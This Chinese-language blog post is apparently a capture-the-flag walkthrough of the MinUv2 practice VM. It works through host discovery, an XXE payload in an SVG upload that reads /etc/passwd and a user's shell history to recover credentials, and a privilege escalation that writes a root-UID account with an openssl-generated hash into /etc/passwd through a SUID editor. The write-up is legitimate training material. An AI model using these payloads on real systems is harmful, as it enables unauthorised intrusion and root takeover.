MinUv2靶机渗透实战

这篇在安全客投稿失败，就发布在简书上吧
以后大家可以在安全客上关注我：hack-shark

靶机IP发现

靶机发现，fping是我常用的ping活的方式，之前很多人询问如何探测靶IP，以后探测IP阶段不再赘述了

靶机放在VBox仅主机网络56段的网络下，hunt桥接到VBox的该网卡上，hunt的IP为：192.168.56.103

fping -a -q -g 192.168.56.1 192.168.56.254

image.png

参数解释：

-a ping 活
-q quiet 静默ping，不显示
-g ip地址范围

探测出靶机IP为：192.168.56.101

信息收集

nmap全扫

nmap -sS -Pn -A -p- -n 192.168.56.101

image.png

3306一看就是web服务

web信息收集

http://192.168.56.101:3306/

image.png

啥玩意没有，跑遍目录试试

dirb http://192.168.56.101:3306/

跑不出来

再试一下，配置好参数再跑

image.png

发下了一个上传页面 upload.html

image.png

http://192.168.56.101:3306/upload.html

image.png

查看源码发现能上传svg的图片格式

image.png

SVG是一种基于xml的矢量图像，可在Web和其他环境中展示各种图形。由于它是xml结构，所以支持各种xml特性，其中一个特性是XLink，支持在xml文档中创建内部或外部的超链接

XXE

试试XML外部实体注入攻击

大家可以在这里练练手

https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload

image.png

上传随便一个.svg格式文件，抓包执行以下XML代码，看是否能够读取靶机的passwd

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY passwd SYSTEM "file:////etc/passwd">]>
<foo>
        <value>&passwd;</value>
</foo>

image.png

发现了root用户和employee是/bin/ash的shell

搜一下相关资料

ash
一个简单的轻量级的 Shell，占用资源少，适合运行于低内存环境，与bash shell 完全兼容

既然是与bash相同，不妨看看本机上用户的目录文件，以root用户为了，其目录下一般会有以下文件

image.png

不妨依次读取靶机上的相应文件试试（改成.ash_xxx）

最后发现只有file://///home/employee/.ash_history可以读取：

image.png

useradd -D bossdonttrackme -p superultrapass3

登录ssh

想必上述就是的账号、口令

ssh bossdonttrackme@192.168.56.101

无法登录。。。

试试employee用户

ssh employee@192.168.56.101

image.png image.png

这么新的版本应该没漏洞

翻了好久，没有什么发现，查看一下靶机可以执行的二进制文件

find / -perm -4000 2> /dev/null

image.png

提权

该文件是有root权限的，可以用来提权

image.png

将空密码且具有root权限的用户hack通过/usr/bin/micro利用 “ | ”写入passwd进行提权

cat /etc/passwd | /usr/bin/micro

hack::0:0:::/bin/bash

image.png

su hack

很遗憾失败了

image.png

不正确的密码，看来不能是空密码

openssl 加盐生成密码hash

通过opessl加盐生成密码hash再写入passwd试试

openssl passwd -1 -salt hack hack

密码为hack，加盐也为hack

生成了密码hash

$1$hack$xR6zsfvpez/t8teGRRSNr.

image.png

hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0:root:root:/bin/bash

再次写入/etc/passwd中

image.png

我忘了靶机没有bash环境

改成ash即可

image.png

get flag成功！！！

总结

1、信息收集阶段，在以后渗透过程，爆目录也要考虑到一些特殊的后缀，如html,txt,zip,tar……

2、XML注入要能够灵活运用，比如可以用于php命令执行，甚至可以通内网等

3、借助可执行文件root是最难得，伪造passwd和shadow也是常用来提权的方法之一。

靶机百度云下载

链接：https://pan.baidu.com/s/1BUuZCX5wXvVO8gxTZBmP4Q
提取码：kjuw